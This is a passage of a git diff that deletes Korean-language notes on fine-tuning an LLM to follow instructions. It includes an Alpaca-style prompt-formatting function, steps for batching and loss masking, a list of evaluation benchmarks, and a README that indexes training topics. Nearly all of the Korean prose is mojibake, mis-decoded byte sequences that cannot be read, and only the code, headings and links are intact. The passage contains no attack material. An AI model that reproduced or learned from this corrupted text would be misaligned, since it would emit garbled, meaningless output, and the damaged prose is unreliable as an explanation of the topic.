์›ํ•˜๋Š” ํ”„๋กฌํ”„ํŠธ ํ˜•์‹์œผ๋กœ ํ•ด๋‹น ๋ฐ์ดํ„ฐ๋ฅผ ๋ชจ๋ธ๋งํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์˜ˆ: -```python -# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb -def format_input(entry): -instruction_text = ( -f"Below is an instruction that describes a task. " -f"Write a response that appropriately completes the request." -f"\n\n### Instruction:\n{entry['instruction']}" -) - -input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else "" - -return instruction_text + input_text - -model_input = format_input(data[50]) - -desired_response = f"\n\n### Response:\n{data[50]['output']}" - -print(model_input + desired_response) -``` -๊ทธ๋Ÿฐ ๋‹ค์Œ, ํ•ญ์ƒ์ฒ˜๋Ÿผ ๋ฐ์ดํ„ฐ์…‹์„ ํ›ˆ๋ จ, ๊ฒ€์ฆ ๋ฐ ํ…Œ์ŠคํŠธ ์„ธํŠธ๋กœ ๋ถ„๋ฆฌํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. - -## ๋ฐฐ์น˜ ๋ฐ ๋ฐ์ดํ„ฐ ๋กœ๋” - -๊ทธ๋Ÿฐ ๋‹ค์Œ, ํ›ˆ๋ จ์„ ์œ„ํ•ด ๋ชจ๋“  ์ž…๋ ฅ๊ณผ ์˜ˆ์ƒ ์ถœ๋ ฅ์„ ๋ฐฐ์น˜ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์œ„ํ•ด ํ•„์š”ํ•œ ๊ฒƒ์€: - -- ํ…์ŠคํŠธ๋ฅผ ํ† ํฐํ™”ํ•ฉ๋‹ˆ๋‹ค. -- ๋ชจ๋“  ์ƒ˜ํ”Œ์„ ๋™์ผํ•œ ๊ธธ์ด๋กœ ํŒจ๋”ฉํ•ฉ๋‹ˆ๋‹ค(์ผ๋ฐ˜์ ์œผ๋กœ ๊ธธ์ด๋Š” LLM์„ ์‚ฌ์ „ ํ›ˆ๋ จํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋œ ์ปจํ…์ŠคํŠธ ๊ธธ์ด๋งŒํผ ํฝ๋‹ˆ๋‹ค). -- ์‚ฌ์šฉ์ž ์ •์˜ ์ฝœ๋ ˆ์ดํŠธ ํ•จ์ˆ˜์—์„œ ์ž…๋ ฅ์„ 1๋งŒํผ ์ด๋™์‹œ์ผœ ์˜ˆ์ƒ ํ† ํฐ์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ์†์‹ค์—์„œ ์ œ์™ธํ•˜๊ธฐ ์œ„ํ•ด ์ผ๋ถ€ ํŒจ๋”ฉ ํ† ํฐ์„ -100์œผ๋กœ ๊ต์ฒดํ•ฉ๋‹ˆ๋‹ค: ์ฒซ ๋ฒˆ์งธ `endoftext` ํ† ํฐ ์ดํ›„์— ๋ชจ๋“  ๋‹ค๋ฅธ `endoftext` ํ† ํฐ์„ -100์œผ๋กœ ๋Œ€์ฒดํ•ฉ๋‹ˆ๋‹ค(์™œ๋ƒํ•˜๋ฉด `cross_entropy(...,ignore_index=-100)`๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด -100์ธ ํƒ€๊ฒŸ์„ ๋ฌด์‹œํ•˜๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค). -- \[์„ ํƒ ์‚ฌํ•ญ\] LLM์ด ๋‹ต๋ณ€์„ ์ƒ์„ฑํ•˜๋Š” ๋ฐฉ๋ฒ•๋งŒ ๋ฐฐ์šฐ๋„๋ก ์งˆ๋ฌธ์— ํ•ด๋‹นํ•˜๋Š” ๋ชจ๋“  ํ† ํฐ์„ -100์œผ๋กœ ๋งˆ์Šคํ‚นํ•ฉ๋‹ˆ๋‹ค. Apply Alpaca ์Šคํƒ€์ผ์—์„œ๋Š” `### Response:`๊นŒ์ง€ ๋ชจ๋“  ๊ฒƒ์„ ๋งˆ์Šคํ‚นํ•˜๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. - -์ด๋ ‡๊ฒŒ ์ƒ์„ฑํ•œ ํ›„, ๊ฐ ๋ฐ์ดํ„ฐ์…‹(ํ›ˆ๋ จ, ๊ฒ€์ฆ ๋ฐ ํ…Œ์ŠคํŠธ)์— ๋Œ€ํ•œ ๋ฐ์ดํ„ฐ ๋กœ๋”๋ฅผ ์ƒ์„ฑํ•  ์‹œ๊ฐ„์ž…๋‹ˆ๋‹ค. - -## ์‚ฌ์ „ ํ›ˆ๋ จ๋œ LLM ๋กœ๋“œ ๋ฐ ๋ฏธ์„ธ ์กฐ์ • ๋ฐ ์†์‹ค ํ™•์ธ - -์‚ฌ์ „ ํ›ˆ๋ จ๋œ LLM์„ ๋กœ๋“œํ•˜์—ฌ ๋ฏธ์„ธ ์กฐ์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋‹ค๋ฅธ ํŽ˜์ด์ง€์—์„œ ์ด๋ฏธ ๋…ผ์˜๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, ์ด์ „์— ์‚ฌ์šฉ๋œ ํ›ˆ๋ จ ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ LLM์„ ๋ฏธ์„ธ ์กฐ์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -ํ›ˆ๋ จ ์ค‘์—๋Š” ํ›ˆ๋ จ ์†์‹ค๊ณผ ๊ฒ€์ฆ ์†์‹ค์ด ์—ํฌํฌ ๋™์•ˆ ์–ด๋–ป๊ฒŒ ๋ณ€ํ•˜๋Š”์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์–ด ์†์‹ค์ด ์ค„์–ด๋“ค๊ณ  ์žˆ๋Š”์ง€, ๊ณผ์ ํ•ฉ์ด ๋ฐœ์ƒํ•˜๊ณ  ์žˆ๋Š”์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -๊ณผ์ ํ•ฉ์€ ํ›ˆ๋ จ ์†์‹ค์ด ์ค„์–ด๋“ค๊ณ  ์žˆ์ง€๋งŒ ๊ฒ€์ฆ ์†์‹ค์ด ์ค„์–ด๋“ค์ง€ ์•Š๊ฑฐ๋‚˜ ์‹ฌ์ง€์–ด ์ฆ๊ฐ€ํ•  ๋•Œ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ํ”ผํ•˜๊ธฐ ์œ„ํ•ด ๊ฐ€์žฅ ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ฒ•์€ ์ด๋Ÿฌํ•œ ํ–‰๋™์ด ์‹œ์ž‘๋˜๋Š” ์—ํฌํฌ์—์„œ ํ›ˆ๋ จ์„ ์ค‘๋‹จํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. - -## ์‘๋‹ต ํ’ˆ์งˆ - -์ด๊ฒƒ์€ ์†์‹ค ๋ณ€ํ™”๋ฅผ ๋” ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋ถ„๋ฅ˜ ๋ฏธ์„ธ ์กฐ์ •์ด ์•„๋‹ˆ๋ฏ€๋กœ, ํ…Œ์ŠคํŠธ ์„ธํŠธ์—์„œ ์‘๋‹ต์˜ ํ’ˆ์งˆ์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ๋„ ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ๋ชจ๋“  ํ…Œ์ŠคํŠธ ์„ธํŠธ์—์„œ ์ƒ์„ฑ๋œ ์‘๋‹ต์„ ์ˆ˜์ง‘ํ•˜๊ณ  **๊ทธ ํ’ˆ์งˆ์„ ์ˆ˜๋™์œผ๋กœ ํ™•์ธํ•˜๋Š”** ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. ์ž˜๋ชป๋œ ๋‹ต๋ณ€์ด ์žˆ๋Š”์ง€ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค(LLM์ด ์‘๋‹ต ๋ฌธ์žฅ์˜ ํ˜•์‹๊ณผ ๊ตฌ๋ฌธ์„ ์˜ฌ๋ฐ”๋ฅด๊ฒŒ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ์ง€๋งŒ ์™„์ „ํžˆ ์ž˜๋ชป๋œ ์‘๋‹ต์„ ์ œ๊ณตํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์‹ญ์‹œ์˜ค. ์†์‹ค ๋ณ€๋™์€ ์ด๋Ÿฌํ•œ ํ–‰๋™์„ ๋ฐ˜์˜ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค).\ -์ƒ์„ฑ๋œ ์‘๋‹ต๊ณผ ์˜ˆ์ƒ ์‘๋‹ต์„ **๋‹ค๋ฅธ LLM์— ์ „๋‹ฌํ•˜์—ฌ ์‘๋‹ต์„ ํ‰๊ฐ€ํ•˜๋„๋ก ์š”์ฒญํ•˜๋Š”** ๋ฐฉ์‹์œผ๋กœ ์ด ๊ฒ€ํ† ๋ฅผ ์ˆ˜ํ–‰ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค. - -์‘๋‹ต ํ’ˆ์งˆ์„ ๊ฒ€์ฆํ•˜๊ธฐ ์œ„ํ•ด ์‹คํ–‰ํ•  ๋‹ค๋ฅธ ํ…Œ์ŠคํŠธ: - -1. **๋Œ€๊ทœ๋ชจ ๋‹ค์ค‘ ์ž‘์—… ์–ธ์–ด ์ดํ•ด(**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU๋Š” ์ธ๋ฌธํ•™, ๊ณผํ•™ ๋“ฑ 57๊ฐœ ์ฃผ์ œ์— ๊ฑธ์ณ ๋ชจ๋ธ์˜ ์ง€์‹๊ณผ ๋ฌธ์ œ ํ•ด๊ฒฐ ๋Šฅ๋ ฅ์„ ํ‰๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. ๋‹ค์–‘ํ•œ ๋‚œ์ด๋„์—์„œ ์ดํ•ด๋„๋ฅผ ํ‰๊ฐ€ํ•˜๊ธฐ ์œ„ํ•ด ๊ฐ๊ด€์‹ ์งˆ๋ฌธ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -2. [**LMSYS ์ฑ—๋ด‡ ์•„๋ ˆ๋‚˜**](https://arena.lmsys.org): ์ด ํ”Œ๋žซํผ์€ ์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค์–‘ํ•œ ์ฑ—๋ด‡์˜ ์‘๋‹ต์„ ๋‚˜๋ž€ํžˆ ๋น„๊ตํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ์ž๊ฐ€ ํ”„๋กฌํ”„ํŠธ๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ์—ฌ๋Ÿฌ ์ฑ—๋ด‡์ด ์‘๋‹ต์„ ์ƒ์„ฑํ•˜์—ฌ ์ง์ ‘ ๋น„๊ตํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval์€ ๊ณ ๊ธ‰ LLM์ธ GPT-4๊ฐ€ ๋‹ค์–‘ํ•œ ํ”„๋กฌํ”„ํŠธ์— ๋Œ€ํ•œ ๋‹ค๋ฅธ ๋ชจ๋ธ์˜ ์‘๋‹ต์„ ํ‰๊ฐ€ํ•˜๋Š” ์ž๋™ํ™”๋œ ํ‰๊ฐ€ ํ”„๋ ˆ์ž„์›Œํฌ์ž…๋‹ˆ๋‹ค. -4. **์ผ๋ฐ˜ ์–ธ์–ด ์ดํ•ด ํ‰๊ฐ€(**[**GLUE**](https://gluebenchmark.com/)**):** GLUE๋Š” ๊ฐ์ • ๋ถ„์„, ํ…์ŠคํŠธ ํ•จ์˜ ๋ฐ ์งˆ๋ฌธ ์‘๋‹ต์„ ํฌํ•จํ•œ ์•„ํ™‰ ๊ฐ€์ง€ ์ž์—ฐ์–ด ์ดํ•ด ์ž‘์—…์˜ ๋ชจ์Œ์ž…๋‹ˆ๋‹ค. -5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** GLUE๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜์—ฌ SuperGLUE๋Š” ํ˜„์žฌ ๋ชจ๋ธ์— ๋Œ€ํ•ด ์–ด๋ ค์šด ์ž‘์—…์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. -6. **๋ชจ๋ฐฉ ๊ฒŒ์ž„ ๋ฒค์น˜๋งˆํฌ ์ดˆ๊ณผ(**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench๋Š” ์ถ”๋ก , ๋ฒˆ์—ญ ๋ฐ ์งˆ๋ฌธ ์‘๋‹ต๊ณผ ๊ฐ™์€ ์˜์—ญ์—์„œ ๋ชจ๋ธ์˜ ๋Šฅ๋ ฅ์„ ํ…Œ์ŠคํŠธํ•˜๋Š” 200๊ฐœ ์ด์ƒ์˜ ์ž‘์—…์„ ํฌํ•จํ•˜๋Š” ๋Œ€๊ทœ๋ชจ ๋ฒค์น˜๋งˆํฌ์ž…๋‹ˆ๋‹ค. -7. **์–ธ์–ด ๋ชจ๋ธ์˜ ์ „์ฒด ํ‰๊ฐ€(**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM์€ ์ •ํ™•์„ฑ, ๊ฐ•๊ฑด์„ฑ ๋ฐ ๊ณต์ •์„ฑ๊ณผ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ๋ฉ”ํŠธ๋ฆญ์— ๊ฑธ์ณ ํฌ๊ด„์ ์ธ ํ‰๊ฐ€๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. -8. [**OpenAI Evals**](https://github.com/openai/evals)**:** OpenAI์—์„œ ์ œ๊ณตํ•˜๋Š” ์˜คํ”ˆ ์†Œ์Šค ํ‰๊ฐ€ ํ”„๋ ˆ์ž„์›Œํฌ๋กœ, ์‚ฌ์šฉ์ž ์ •์˜ ๋ฐ ํ‘œ์ค€ํ™”๋œ ์ž‘์—…์—์„œ AI ๋ชจ๋ธ์„ ํ…Œ์ŠคํŠธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -9. [**HumanEval**](https://github.com/openai/human-eval)**:** ์–ธ์–ด ๋ชจ๋ธ์˜ ์ฝ”๋“œ ์ƒ์„ฑ ๋Šฅ๋ ฅ์„ ํ‰๊ฐ€ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ํ”„๋กœ๊ทธ๋ž˜๋ฐ ๋ฌธ์ œ ๋ชจ์Œ์ž…๋‹ˆ๋‹ค. -10. **์Šคํƒ ํฌ๋“œ ์งˆ๋ฌธ ์‘๋‹ต ๋ฐ์ดํ„ฐ์…‹(**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD๋Š” ๋ชจ๋ธ์ด ์ •ํ™•ํ•˜๊ฒŒ ๋‹ต๋ณ€ํ•˜๊ธฐ ์œ„ํ•ด ํ…์ŠคํŠธ๋ฅผ ์ดํ•ดํ•ด์•ผ ํ•˜๋Š” ์œ„ํ‚คํ”ผ๋””์•„ ๊ธฐ์‚ฌ์— ๋Œ€ํ•œ ์งˆ๋ฌธ์œผ๋กœ ๊ตฌ์„ฑ๋ฉ๋‹ˆ๋‹ค. -11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** ํ€ด์ฆˆ ์งˆ๋ฌธ๊ณผ ๋‹ต๋ณ€์˜ ๋Œ€๊ทœ๋ชจ ๋ฐ์ดํ„ฐ์…‹๊ณผ ์ฆ๊ฑฐ ๋ฌธ์„œ์ž…๋‹ˆ๋‹ค. - -๊ทธ๋ฆฌ๊ณ  ๋งŽ์€ ๋งŽ์€ ๋” ์žˆ์Šต๋‹ˆ๋‹ค. - -## ์ง€์นจ ๋”ฐ๋ฅด๊ธฐ ๋ฏธ์„ธ ์กฐ์ • ์ฝ”๋“œ - -์ด ๋ฏธ์„ธ ์กฐ์ •์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์ฝ”๋“œ์˜ ์˜ˆ๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -## ์ฐธ๊ณ  ๋ฌธํ—Œ - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md deleted file mode 100644 index b1146ab2d..000000000 --- a/src/todo/llm-training-data-preparation/README.md +++ /dev/null @@ -1,98 +0,0 @@ -# LLM Training - Data Preparation - -**์ด๊ฒƒ์€ ๋งค์šฐ ์ถ”์ฒœ๋˜๋Š” ์ฑ…** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **์—์„œ์˜ ๋‚ด ๋…ธํŠธ์™€ ์ถ”๊ฐ€ ์ •๋ณด์ž…๋‹ˆ๋‹ค.** - -## Basic Information - -๊ธฐ๋ณธ ๊ฐœ๋…์— ๋Œ€ํ•ด ์•Œ์•„์•ผ ํ•  ๋‚ด์šฉ์„ ์œ„ํ•ด ์ด ๊ฒŒ์‹œ๋ฌผ์„ ์ฝ๋Š” ๊ฒƒ์œผ๋กœ ์‹œ์ž‘ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: - -{{#ref}} -0.-basic-llm-concepts.md -{{#endref}} - -## 1. Tokenization - -> [!TIP] -> ์ด ์ดˆ๊ธฐ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ž…๋ ฅ์„ ์˜๋ฏธ ์žˆ๋Š” ๋ฐฉ์‹์œผ๋กœ ํ† ํฐ(์•„์ด๋””)์œผ๋กœ ๋‚˜๋ˆ„๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.** - -{{#ref}} -1.-tokenizing.md -{{#endref}} - -## 2. Data Sampling - -> [!TIP] -> ์ด ๋‘ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ž…๋ ฅ ๋ฐ์ดํ„ฐ๋ฅผ ์ƒ˜ํ”Œ๋งํ•˜๊ณ  ํ›ˆ๋ จ ๋‹จ๊ณ„์— ๋งž๊ฒŒ ์ค€๋น„ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ๋ฐ์ดํ„ฐ์…‹์„ ํŠน์ • ๊ธธ์ด์˜ ๋ฌธ์žฅ์œผ๋กœ ๋‚˜๋ˆ„๊ณ  ์˜ˆ์ƒ ์‘๋‹ต๋„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.** - -{{#ref}} -2.-data-sampling.md -{{#endref}} - -## 3. Token Embeddings - -> [!TIP] -> ์ด ์„ธ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์–ดํœ˜์˜ ๊ฐ ์ด์ „ ํ† ํฐ์— ์›ํ•˜๋Š” ์ฐจ์›์˜ ๋ฒกํ„ฐ๋ฅผ ํ• ๋‹นํ•˜์—ฌ ๋ชจ๋ธ์„ ํ›ˆ๋ จํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.** ์–ดํœ˜์˜ ๊ฐ ๋‹จ์–ด๋Š” X ์ฐจ์›์˜ ๊ณต๊ฐ„์—์„œ ํ•œ ์ ์ด ๋ฉ๋‹ˆ๋‹ค.\ -> ์ฒ˜์Œ์—๋Š” ๊ฐ ๋‹จ์–ด์˜ ์œ„์น˜๊ฐ€ "๋ฌด์ž‘์œ„๋กœ" ์ดˆ๊ธฐํ™”๋˜๋ฉฐ, ์ด๋Ÿฌํ•œ ์œ„์น˜๋Š” ํ›ˆ๋ จ ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜์ž…๋‹ˆ๋‹ค(ํ›ˆ๋ จ ์ค‘ ๊ฐœ์„ ๋ฉ๋‹ˆ๋‹ค). -> -> ๊ฒŒ๋‹ค๊ฐ€, ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋™์•ˆ **๋˜ ๋‹ค๋ฅธ ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค**. ์ด๋Š” (์ด ๊ฒฝ์šฐ) **ํ›ˆ๋ จ ๋ฌธ์žฅ์—์„œ ๋‹จ์–ด์˜ ์ ˆ๋Œ€ ์œ„์น˜๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค**. ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด ๋ฌธ์žฅ์—์„œ ์„œ๋กœ ๋‹ค๋ฅธ ์œ„์น˜์— ์žˆ๋Š” ๋‹จ์–ด๋Š” ์„œ๋กœ ๋‹ค๋ฅธ ํ‘œํ˜„(์˜๋ฏธ)์„ ๊ฐ–๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. - -{{#ref}} -3.-token-embeddings.md -{{#endref}} - -## 4. Attention Mechanisms - -> [!TIP] -> ์ด ๋„ค ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ผ๋ถ€ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜์„ ์ ์šฉํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค**. ์ด๋Š” **์–ดํœ˜์˜ ๋‹จ์–ด์™€ ํ˜„์žฌ LLM ํ›ˆ๋ จ์— ์‚ฌ์šฉ๋˜๋Š” ๋ฌธ์žฅ์—์„œ์˜ ์ด์›ƒ ๊ฐ„์˜ ๊ด€๊ณ„๋ฅผ ํฌ์ฐฉํ•˜๋Š” ๋งŽ์€ ๋ฐ˜๋ณต ๋ ˆ์ด์–ด**๊ฐ€ ๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค.\ -> ์ด๋ฅผ ์œ„ํ•ด ๋งŽ์€ ๋ ˆ์ด์–ด๊ฐ€ ์‚ฌ์šฉ๋˜๋ฉฐ, ๋งŽ์€ ํ›ˆ๋ จ ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜๊ฐ€ ์ด ์ •๋ณด๋ฅผ ํฌ์ฐฉํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. - -{{#ref}} -4.-attention-mechanisms.md -{{#endref}} - -## 5. LLM Architecture - -> [!TIP] -> ์ด ๋‹ค์„ฏ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ „์ฒด LLM์˜ ์•„ํ‚คํ…์ฒ˜๋ฅผ ๊ฐœ๋ฐœํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค**. ๋ชจ๋“  ๊ฒƒ์„ ํ•จ๊ป˜ ๋ชจ์œผ๊ณ , ๋ชจ๋“  ๋ ˆ์ด์–ด๋ฅผ ์ ์šฉํ•˜๋ฉฐ, ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ํ…์ŠคํŠธ๋ฅผ ID๋กœ ๋ณ€ํ™˜ํ•˜๊ณ  ๊ทธ ๋ฐ˜๋Œ€๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ๋ชจ๋“  ๊ธฐ๋Šฅ์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. -> -> ์ด ์•„ํ‚คํ…์ฒ˜๋Š” ํ›ˆ๋ จ ํ›„ ํ…์ŠคํŠธ๋ฅผ ์˜ˆ์ธกํ•˜๋Š” ๋ฐ์—๋„ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. - -{{#ref}} -5.-llm-architecture.md -{{#endref}} - -## 6. Pre-training & Loading models - -> [!TIP] -> ์ด ์—ฌ์„ฏ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **๋ชจ๋ธ์„ ์ฒ˜์Œ๋ถ€ํ„ฐ ํ›ˆ๋ จํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค**. ์ด๋ฅผ ์œ„ํ•ด ์ด์ „ LLM ์•„ํ‚คํ…์ฒ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ •์˜๋œ ์†์‹ค ํ•จ์ˆ˜์™€ ์ตœ์ ํ™”๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฐ์ดํ„ฐ ์„ธํŠธ๋ฅผ ๋ฐ˜๋ณตํ•˜๋Š” ๋ฃจํ”„๋ฅผ ํ†ตํ•ด ๋ชจ๋ธ์˜ ๋ชจ๋“  ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ํ›ˆ๋ จํ•ฉ๋‹ˆ๋‹ค. - -{{#ref}} -6.-pre-training-and-loading-models.md -{{#endref}} - -## 7.0. LoRA Improvements in fine-tuning - -> [!TIP] -> **LoRA์˜ ์‚ฌ์šฉ์€ ์ด๋ฏธ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์„ ๋ฏธ์„ธ ์กฐ์ •ํ•˜๋Š” ๋ฐ ํ•„์š”ํ•œ ๊ณ„์‚ฐ์„ ๋งŽ์ด ์ค„์ž…๋‹ˆ๋‹ค.** - -{{#ref}} -7.0.-lora-improvements-in-fine-tuning.md -{{#endref}} - -## 7.1. Fine-Tuning for Classification - -> [!TIP] -> ์ด ์„น์…˜์˜ ๋ชฉํ‘œ๋Š” ์ด๋ฏธ ์‚ฌ์ „ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์„ ๋ฏธ์„ธ ์กฐ์ •ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด์—ฌ์ฃผ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์ƒˆ๋กœ์šด ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๋Œ€์‹  LLM์€ **์ฃผ์–ด์ง„ ํ…์ŠคํŠธ๊ฐ€ ๊ฐ ์ฃผ์–ด์ง„ ์นดํ…Œ๊ณ ๋ฆฌ์— ๋ถ„๋ฅ˜๋  ํ™•๋ฅ ์„ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค**(์˜ˆ: ํ…์ŠคํŠธ๊ฐ€ ์ŠคํŒธ์ธ์ง€ ์•„๋‹Œ์ง€). - -{{#ref}} -7.1.-fine-tuning-for-classification.md -{{#endref}} - -## 7.2. Fine-Tuning to follow instructions - -> [!TIP] -> ์ด ์„น์…˜์˜ ๋ชฉํ‘œ๋Š” **ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๋Œ€์‹  ์ง€์นจ์„ ๋”ฐ๋ฅด๋„๋ก ์ด๋ฏธ ์‚ฌ์ „ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์„ ๋ฏธ์„ธ ์กฐ์ •ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด์—ฌ์ฃผ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค**. ์˜ˆ๋ฅผ ๋“ค์–ด, ์ฑ—๋ด‡์œผ๋กœ์„œ ์ž‘์—…์— ์‘๋‹ตํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. - -{{#ref}} -7.2.-fine-tuning-to-follow-instructions.md -{{#endref}}